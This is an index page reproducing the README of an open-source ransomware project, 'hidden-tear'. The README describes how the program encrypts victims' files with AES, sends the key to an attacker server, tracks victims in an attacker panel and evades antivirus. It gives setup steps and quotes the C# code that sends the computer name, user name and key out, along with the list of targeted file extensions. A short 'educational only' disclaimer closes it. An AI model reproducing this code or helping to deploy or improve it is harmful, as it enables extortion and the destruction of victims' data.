Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Virgula0/hidden-tear
An open source RansomWare
https://github.com/Virgula0/hidden-tear
Last synced: 3 months ago
JSON representation
An open source RansomWare
- Host: GitHub
- URL: https://github.com/Virgula0/hidden-tear
- Owner: Virgula0
- License: mit
- Created: 2017-05-21T13:47:48.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2019-11-24T14:11:17.000Z (almost 5 years ago)
- Last Synced: 2024-06-17T15:53:29.260Z (5 months ago)
- Language: C#
- Size: 189 KB
- Stars: 87
- Watchers: 11
- Forks: 42
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-starz - Virgula0/hidden-tear - An open source RansomWare (C# #)
README
_ _ _ _ _
| | (_) | | | | | |
| |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __
| '_ \| |/ _` |/ _` |/ _ \ '_ \ | __/ _ \/ _` | '__|
| | | | | (_| | (_| | __/ | | | | || __/ (_| | |
|_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_|
It's a ransomware-like file crypter sample which can be modified for specific purposes.
**Features**
* Uses AES algorithm to encrypt files.
* Sends encryption key to a server.
* Encrypted files can be decrypt in decrypter program with encryption key.
* Creates a text file in Desktop with given message.
* Small file size (12 KB)
* Isn't detected by antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt - Do not scan with VirusTotal or similar sites.
* This project was updated by Virgula0 and coded by Uktu Sen.
**New features:**
* A new advanced server script was added that saves data into database.
* All informations are sent if there is an internet connection and the ransomware wait for it if there isn't.
* You can see all target information with Server Attacker panel.
* Script can also send you an email with gathered data.
* It can also encrypt .exe files and no longer gets collisions with other processes.
* It now encrypts a wider variety of file types and has a changing desktop icon with information about the attack.
* Hidden Tear Decryptor now advises if files have been decrypted or not.
* Hidden Tear Decryptor now is able to decrypt the same directories of hidden-tear ransomware.
* Hidden Tear changes default Windows icon of desktop if decryption is succesfully finished.
* A bug that could delete a part of the passcode while sending has been removed.
***************************************************************************************************************************
If you want, you can send some BTC for this re-work and support me.
* Address: 1HfwYmCDiHYRxzcbpDf7vSKfv8g9Y1MgpW | Or you can scan QR code named donation_btc_address.png in the main path
* Paypal: https://paypal.me/Virgula
* Ethereum 0x25119edFC9aA4D5beb40F24f5A759c4CA0263A54
* Bitcoin Cash: qzmd7kn87q5dkmkzalwu6pct82e68skzksxdfxxd0a
Thank You!
***************************************************************************************************************************
**Demonstration Video**
https://www.youtube.com/watch?v=0IvD9Sky9as
Warning: in that video wasn't shown the attacker panel but only the key saved into the file to make the video lasts less.
**Usage**
* You need to have a web server which supports PHP. Change this line with your URL, using an HTTPS connection to avoid eavesdropping.
`string targetURL = "https://www.example.com/Server/write.php";`
* Default Username and password for webpanel (in check.php file) are -> Username: test | Password: test
* Import SQL table in your database importing the file: import.sql
* Set you database credetials in the file: connect_db.php
* If you want also write a file for every virus execution go to file `write.php` and uncomment lines 37 to 43. For privacy of information this is not recommended.
* Set your email to get information also by email (don't write your PERSONAL email) in line 47 of file write.php
* The script should write the GET parameter into a database and optionally into a text file. Sending process running in `SendPassword()` function:
```
string info = "?computer_name=" + computerName + "&userName=" + userName + "&password=" + password + "&allow=ransom";
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
```
* Target file extensions can be changed. Default list:
```
var validExtensions = new[]{".txt", ".jar", ".exe", ".dat", ".contact" , ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd" , ".pdf" , ".dll" , ".c" , ".cs", ".mp3" , ".mp4", ".f3d" , ".dwg" , ".cpp" , ".zip" , ".rar" , ".mov" , ".rtf" , ".bmp" , ".mkv" , ".avi" , ".apk" , ".lnk" , ".iso", ".7-zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj" , ".pdb", ".ico" , ".pas" , ".db" , ".torrent" };
```
* PLEASE DON'T ADD .INI EXTENSION BECAUSE THE CONFILCT WITH THESE FILES WILL CRASH YOUR SCRIPT.
* In this re-upload there is a function that waits for internet connection before sending password to the database:
```
//check for internet connection
public static bool CheckForInternetConnection()
{
try
{
using (var client = new WebClient())
{
using (var stream = client.OpenRead("https://www.google.com"))
{
return true;
}
}
}
catch
{
return false;
}
}
```
**Legal Warning**
While this may be helpful for some, there are significant risks. Hidden Tear may be used for educational purposes only. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running Hidden Tear, even though you are innocent.